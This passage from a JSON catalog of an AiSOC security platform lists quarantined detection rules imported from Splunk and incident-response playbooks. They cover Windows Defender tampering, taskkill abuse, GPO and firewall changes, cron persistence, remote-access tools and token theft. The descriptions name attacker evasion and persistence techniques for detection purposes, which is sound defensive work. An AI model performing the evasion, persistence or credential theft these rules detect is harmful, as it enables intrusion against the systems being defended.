If confirmed malicious, this activity could allow attackers to bypass Windows Defender, facilitating undetected malware execution and persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-compute-file-hashes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe52c280-98bd-4596-b6f6-a13bbf8ac7c6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_compute_file_hashes.yml" } }, { "id": "splunk-security-content-fe5bca48-accb-11eb-a67c-acde48001122", "type": "detection", "name": "Excessive Usage Of Taskkill", "description": "The following analytic identifies excessive usage of `taskkill.exe`, a command-line utility used to terminate processes. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on instances where `taskkill.exe` is executed ten or more times within a one-minute span. This behavior is significant as adversaries often use `taskkill.exe` to disable security tools or other critical processes to evade detection. 
If confirmed malicious, this activity could allow attackers to bypass security defenses, maintain persistence, and further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-taskkill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe5bca48-accb-11eb-a67c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_taskkill.yml" } }, { "id": "splunk-security-content-fe6a6cc4-9e0d-4d66-bcf4-2c7f44860876", "type": "detection", "name": "Windows Default Group Policy Object Modified", "description": "The following analytic detects modifications to default Group Policy Objects (GPOs) using Event ID 5136. It monitors changes to the `Default Domain Controllers Policy` and `Default Domain Policy`, which are critical for enforcing security settings across domain controllers and all users/computers, respectively. This activity is significant because unauthorized changes to these GPOs can indicate an adversary with privileged access attempting to deploy persistence mechanisms or execute malware across the network. 
If confirmed malicious, such modifications could lead to widespread compromise, allowing attackers to maintain control and execute arbitrary code on numerous hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-group-policy-object-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe6a6cc4-9e0d-4d66-bcf4-2c7f44860876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_group_policy_object_modified.yml" } }, { "id": "splunk-security-content-fe7efbf7-5f82-44b9-8c33-316189ab2393", "type": "detection", "name": "Windows Firewall Rule Modification", "description": "This detection identifies instances where a Windows Firewall rule has been modified, which may indicate an attempt to alter security policies. Unauthorized modifications can weaken firewall protections, allowing malicious traffic or preventing legitimate communications. The event logs details such as the modified rule name, protocol, ports, application path, and the user responsible for the change. 
Security teams should monitor unexpected modifications, correlate them with related events, and investigate anomalies to prevent unauthorized access and maintain network security integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe7efbf7-5f82-44b9-8c33-316189ab2393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_modification.yml" } }, { "id": "splunk-security-content-fe9391cd-952a-4c64-8f56-727cb0d4f2d4", "type": "detection", "name": "Windows Impair Defense Change Win Defender Tracing Level", "description": "The following analytic detects modifications to the Windows registry specifically targeting the \"WppTracingLevel\" setting within Windows Defender. This detection leverages data from the Endpoint.Registry data model to identify changes in the registry path associated with Windows Defender tracing levels. Such modifications are significant as they can impair the diagnostic capabilities of Windows Defender, potentially hiding malicious activities. 
If confirmed malicious, this activity could allow an attacker to evade detection and maintain persistence within the environment, leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-tracing-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fe9391cd-952a-4c64-8f56-727cb0d4f2d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_tracing_level.yml" } }, { "id": "splunk-security-content-fea515a4-b1d8-4cd6-80d6-e0d71397b891", "type": "detection", "name": "Kubernetes Previously Unseen Container Image Name", "description": "The following analytic identifies the creation of containerized workloads using previously unseen images in a Kubernetes cluster. It leverages process metrics from an OTEL collector and Kubernetes cluster receiver, pulled from Splunk Observability Cloud. The detection compares container image names seen in the last hour with those from the previous 30 days. This activity is significant as unfamiliar container images may introduce vulnerabilities, malware, or misconfigurations, posing threats to the cluster's integrity. 
If confirmed malicious, compromised images can lead to data breaches, service disruptions, unauthorized access, and potential lateral movement within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-previously-unseen-container-image-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fea515a4-b1d8-4cd6-80d6-e0d71397b891", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_previously_unseen_container_image_name.yml" } }, { "id": "splunk-security-content-fea71cf0-fa10-4ef6-9202-9682b2e0c477", "type": "detection", "name": "Linux Auditd Possible Append Cronjob Entry On Existing Cronjob File", "description": "The following analytic detects potential tampering with cronjob files on a Linux system.\nIt leverages logs from Linux Auditd, focusing on events of type PATH or CWD.\nThis activity could be significant because adversaries often use it for persistence or privilege escalation.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, this could allow attackers to execute unauthorized code automatically, leading to system compromises and unauthorized data access, thereby impacting business operations and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" 
], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-append-cronjob-entry-on-existing-cronjob-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fea71cf0-fa10-4ef6-9202-9682b2e0c477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_append_cronjob_entry_on_existing_cronjob_file.yml" } }, { "id": "splunk-security-content-feb43b86-8c38-46cd-865e-20ce8a96c26c", "type": "detection", "name": "Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr", "description": "The following analytic detects the creation or modification of Windows Scheduled Tasks related to CompMgmtLauncher or Eventvwr. These legitimate system utilities, used for launching the Computer Management Console and Event Viewer, can be abused by attackers to execute malicious payloads under the guise of normal system processes. By leveraging these tasks, adversaries can establish persistence or elevate privileges without raising suspicion. 
This detection helps security analysts identify unusual or unauthorized scheduled tasks involving these executables, allowing for timely investigation and remediation of potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-tasks-for-compmgmtlauncher-or-eventvwr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "feb43b86-8c38-46cd-865e-20ce8a96c26c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_tasks_for_compmgmtlauncher_or_eventvwr.yml" } }, { "id": "splunk-security-content-fedb49c4-4bd7-4d42-8fd9-f8c8538c73c4", "type": "detection", "name": "Windows InProcServer32 New Outlook Form", "description": "The following analytic detects the creation or modification of registry keys associated with new Outlook form installations, potentially indicating exploitation of CVE-2024-21378. It leverages data from the Endpoint.Registry datamodel, focusing on registry paths involving InProcServer32 keys linked to Outlook forms. This activity is significant as it may signify an attempt to achieve authenticated remote code execution via malicious form objects. 
If confirmed malicious, this could allow an attacker to create arbitrary files and registry keys, leading to remote code execution and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-inprocserver32-new-outlook-form.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fedb49c4-4bd7-4d42-8fd9-f8c8538c73c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_inprocserver32_new_outlook_form.yml" } }, { "id": "splunk-security-content-ff56d843-57de-4a87-b726-13b145f6bf96", "type": "detection", "name": "Cisco Duo Policy Allow Old Java", "description": "The following analytic detects when a Duo policy is created or updated to allow the use of outdated Java versions, which can introduce significant\nsecurity risks. It works by searching Duo administrator activity logs for policy creation or update actions where the policy explicitly sets\n'java_remediation' to 'no remediation', indicating that no restrictions are enforced against old Java. The analytic aggregates relevant details\nsuch as the user, admin email, and action context for further investigation. Identifying this behavior is critical for a Security Operations Center\n(SOC) because allowing outdated Java can expose an organization to known vulnerabilities, malware, and exploitation techniques. 
Attackers or malicious\ninsiders may attempt to weaken security controls by modifying policies to permit insecure software, increasing the risk of compromise. Prompt detection\nenables SOC analysts to respond quickly, revert risky changes, and mitigate potential threats before they are exploited.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-old-java.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff56d843-57de-4a87-b726-13b145f6bf96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_old_java.yml" } }, { "id": "splunk-security-content-ff61e98c-0337-4593-a78f-72a676c56f26", "type": "detection", "name": "Suspicious DLLHost no Command Line Arguments", "description": "The following analytic detects instances of DLLHost.exe executing without command line arguments. This behavior is unusual and often associated with malicious activities, such as those performed by Cobalt Strike. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because DLLHost.exe typically requires arguments to function correctly, and its absence may indicate an attempt to evade detection. 
If confirmed malicious, this could lead to unauthorized actions like credential dumping or file manipulation, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-dllhost-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff61e98c-0337-4593-a78f-72a676c56f26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_dllhost_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-ff86077c-9212-11eb-a1e6-acde48001122", "type": "detection", "name": "Disabling CMD Application", "description": "The following analytic detects modifications to the registry that disable the CMD prompt application. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"DisableCMD\" registry value. This activity is significant because disabling CMD can hinder an analyst's ability to investigate and remediate threats, a tactic often used by malware such as RATs, Trojans, or Worms. 
If confirmed malicious, this could prevent security teams from using CMD for directory and file traversal, complicating incident response and allowing the attacker to maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-cmd-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ff86077c-9212-11eb-a1e6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_cmd_application.yml" } }, { "id": "splunk-security-content-ffd5e001-2e34-48f4-97a2-26dc4bb08178", "type": "detection", "name": "Detect Remote Access Software Usage Process", "description": "The following analytic detects the execution of known remote access software within the environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes mapped to the Endpoint data model. We then compare with a list of known remote access software shipped as a lookup file - remote_access_software. This activity is significant as adversaries often use remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer to maintain unauthorized access. 
If confirmed malicious, this could allow attackers to control systems remotely, exfiltrate data, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffd5e001-2e34-48f4-97a2-26dc4bb08178", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_process.yml" } }, { "id": "splunk-security-content-ffd99aea-542f-448e-b737-091c1b417274", "type": "detection", "name": "Windows Impair Defense Disable Realtime Signature Delivery", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender real-time signature delivery feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender signature updates. This activity is significant because disabling real-time signature delivery can prevent Windows Defender from receiving timely malware definitions, reducing its effectiveness. 
If confirmed malicious, this action could allow attackers to bypass malware detection, leading to potential system compromise and persistent threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-realtime-signature-delivery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffd99aea-542f-448e-b737-091c1b417274", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_realtime_signature_delivery.yml" } }, { "id": "splunk-security-content-ffeb7893-ff06-446f-815b-33ca73224e92", "type": "detection", "name": "Windows Registry Delete Task SD", "description": "The following analytic detects a process attempting to delete a scheduled task's Security Descriptor (SD) from the registry path of that task.\nIt leverages the Endpoint.Registry data model to identify registry actions performed by the SYSTEM user, specifically targeting deletions of the SD value.\nThis activity is significant as it may indicate an attempt to remove evidence of a scheduled task for defense evasion.\nIf confirmed malicious, it suggests an attacker with privileged access trying to hide their tracks, potentially compromising system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1562" ], "log_source": null, "playbook": null, "verified": 
false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-delete-task-sd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ffeb7893-ff06-446f-815b-33ca73224e92", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_delete_task_sd.yml" } }, { "id": "supply-chain-compromise-v1", "type": "detection", "name": "Supply Chain Compromise Response", "description": "Responds to suspected supply chain attacks including malicious package updates, compromised third-party libraries, or tampered build artifacts. Quarantines affected builds, notifies DevSecOps, and triggers a software inventory audit.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "supply-chain", "devops", "sca", "build-security", "oss" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/supply-chain-compromise.yaml" }, { "id": "suspicious-signin-response-v1", "type": "detection", "name": "Suspicious Sign-In Response", "description": "Responds to suspicious sign-in events including impossible travel, new country logins, known bad IP addresses, or sign-ins outside business hours. 
Triggers step-up authentication or session termination based on risk score.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "sign-in", "identity", "authentication", "impossible-travel", "conditional-access" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/suspicious-signin-response.yaml" }, { "id": "token-theft-response-v1", "type": "detection", "name": "Authentication Token Theft Response", "description": "Responds to stolen authentication token usage including JWT hijacking, session cookie theft, and bearer token replay attacks. Revokes tokens, forces re-authentication, and checks for downstream unauthorized access.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "token-theft", "identity", "jwt", "session-hijacking", "authentication" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/token-theft-response.yaml" }, { "id": "web-application-attack-v1", "type": "detection", "name": "Web Application Attack Response", "description": "Responds to web application attacks including SQL injection, XSS, RCE, and directory traversal. 
Blocks attacking IPs, captures forensic evidence, checks for data exfiltration, and notifies the AppSec team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "web", "appsec", "waf", "sqli", "xss", "rce" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/web-application-attack.yaml" }, { "id": "anomalous-data-transfer-response-v1", "type": "playbook", "name": "Anomalous Data Transfer: DLP / Exfiltration Response", "description": "Triggered by a DLP or UEBA alert detecting an anomalously large or out-of-policy data transfer, potential exfiltration to external destination, or sensitive data leaving the organization. Correlates evidence, blocks destination if malicious, and disables the user if compromise is confirmed.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "data-exfiltration", "dlp", "ueba", "anomalous-data", "insider-threat" ], "severity": "critical", "trigger": "alert", "steps": 11, "category": "anomalous-data", "mitre_techniques": [ "T1041", "T1048", "T1567" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/anomalous-data/anomalous-data-transfer-response.playbook.json" }, { "id": "ato-credential-stuffing-v1", "type": "playbook", "name": "ATO: Credential Stuffing \u2014 Block & Reset", "description": "Triggered by high-volume failed logins from a single source. 
Blocks the IP range, identifies impacted users, and forces resets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity" ], "severity": "critical", "trigger": "alert", "steps": 7, "category": "account-takeover", "mitre_techniques": [ "T1110.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-credential-stuffing.playbook.json" }, { "id": "ato-impossible-travel-block-v1", "type": "playbook", "name": "ATO: Impossible Travel \u2014 Block & Reset", "description": "Triggered by impossible-travel detections. Blocks the source IP, force-revokes active sessions for the user, and requires human approval before forcing a password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "account-takeover", "mitre_techniques": [ "T1078" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-impossible-travel-block.playbook.json" }, { "id": "ato-mfa-fatigue-response-v1", "type": "playbook", "name": "ATO: MFA Fatigue \u2014 Challenge & Reset", "description": "Triggered when a user receives an unusual burst of MFA prompts. Enforces step-up auth and resets MFA factors after approval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "mfa" ], "severity": "high", "trigger": "alert", "steps": 7, "category": "account-takeover", "mitre_techniques": [ "T1621" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-mfa-fatigue-response.playbook.json" }, { "id": "ato-session-token-theft-v1", "type": "playbook", "name": "ATO: Session Token Theft \u2014 Revoke & Isolate", "description": "Triggered when an authenticated session is observed from a new device + new geo simultaneously. 
Revokes all tokens and isolates the originating endpoint if known.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "session-hijack" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "account-takeover", "mitre_techniques": [ "T1539" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-session-token-theft.playbook.json" }, { "id": "ato-suspicious-oauth-grant-v1", "type": "playbook", "name": "ATO: Suspicious OAuth Grant \u2014 Revoke & Investigate", "description": "Triggered when a user grants a new OAuth scope to an unfamiliar third-party app. Revokes the grant and investigates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "account-takeover", "ato", "identity", "oauth" ], "severity": "high", "trigger": "alert", "steps": 5, "category": "account-takeover", "mitre_techniques": [ "T1528" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/account-takeover/ato-suspicious-oauth-grant.playbook.json" }, { "id": "bec-conditional-access-bypass-v1", "type": "playbook", "name": "BEC: Conditional Access Policy Bypass", "description": "Triggered when a BEC-related sign-in succeeds from a region that should be blocked by Conditional Access. Restores policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "identity", "conditional-access" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "bec", "mitre_techniques": [], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-conditional-access-bypass.playbook.json" }, { "id": "bec-impersonation-domain-v1", "type": "playbook", "name": "BEC: Impersonation Domain Quarantine", "description": "Triggered when an inbound email originates from a look-alike of an executive's or vendor's domain. 
Quarantines and blocks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "email" ], "severity": "high", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1656" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-impersonation-domain.playbook.json" }, { "id": "bec-inbox-rule-malicious-v1", "type": "playbook", "name": "BEC: Malicious Inbox Rule Removed", "description": "Triggered when a forwarding/filter rule is created that hides vendor or finance keywords. Removes the rule and resets creds.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "email" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1564.008" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-inbox-rule-malicious.playbook.json" }, { "id": "bec-token-theft-v1", "type": "playbook", "name": "BEC: M365 / Workspace Token Theft", "description": "Triggered when a refresh token is observed from a new ASN with no interactive sign-in. Revokes refresh tokens and forces MFA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "identity", "token-theft" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1539" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-token-theft.playbook.json" }, { "id": "bec-vendor-payment-redirect-v1", "type": "playbook", "name": "BEC: Vendor Payment Redirect \u2014 Freeze", "description": "Triggered when a vendor banking detail change happens via email. 
Freezes pending payments and pages CFO.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "finance" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1565.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-vendor-payment-redirect.playbook.json" }, { "id": "brute-force-lockout-v1", "type": "playbook", "name": "Brute Force: Account Lockout and Source Block", "description": "Triggered by detection of repeated failed authentication attempts (password spray, credential stuffing, RDP/SSH brute force). Locks out the targeted account, blocks the source IP, and triggers investigation.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "brute-force", "credential-stuffing", "password-spray", "authentication" ], "severity": "critical", "trigger": "alert", "steps": 10, "category": "brute-force", "mitre_techniques": [ "T1110", "T1110.001", "T1110.003" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/brute-force/brute-force-lockout.playbook.json" }, { "id": "cloud-ato-response-v1", "type": "playbook", "name": "Cloud ATO: Compromised Cloud Account Response", "description": "Triggered by anomalous API activity, impossible travel, or cloud CSPM alert indicating a compromised cloud account. 
Revokes active sessions, rotates credentials, preserves audit trail, and notifies cloud security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "cloud-account-takeover", "cloud", "iam", "identity" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "cloud-account-takeover", "mitre_techniques": [ "T1078.004", "T1535" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-account-takeover/cloud-ato-response.playbook.json" }, { "id": "cloud-azure-blob-public-v1", "type": "playbook", "name": "Cloud: Azure Blob Container Public", "description": "Triggered when an Azure Storage container is set to public. Reverts to private and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "azure", "storage" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1530" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-azure-blob-public.playbook.json" }, { "id": "cloud-cloudtrail-disabled-v1", "type": "playbook", "name": "Cloud: CloudTrail Disabled \u2014 Re-enable", "description": "Triggered when a CloudTrail trail is stopped. Restarts trail and audits API calls in the dark window.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "logging" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1562.008" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-cloudtrail-disabled.playbook.json" }, { "id": "cloud-cross-account-trust-v1", "type": "playbook", "name": "Cloud: Unexpected Cross-Account Trust", "description": "Triggered when a role trust policy adds an external account ID not on the allow-list. 
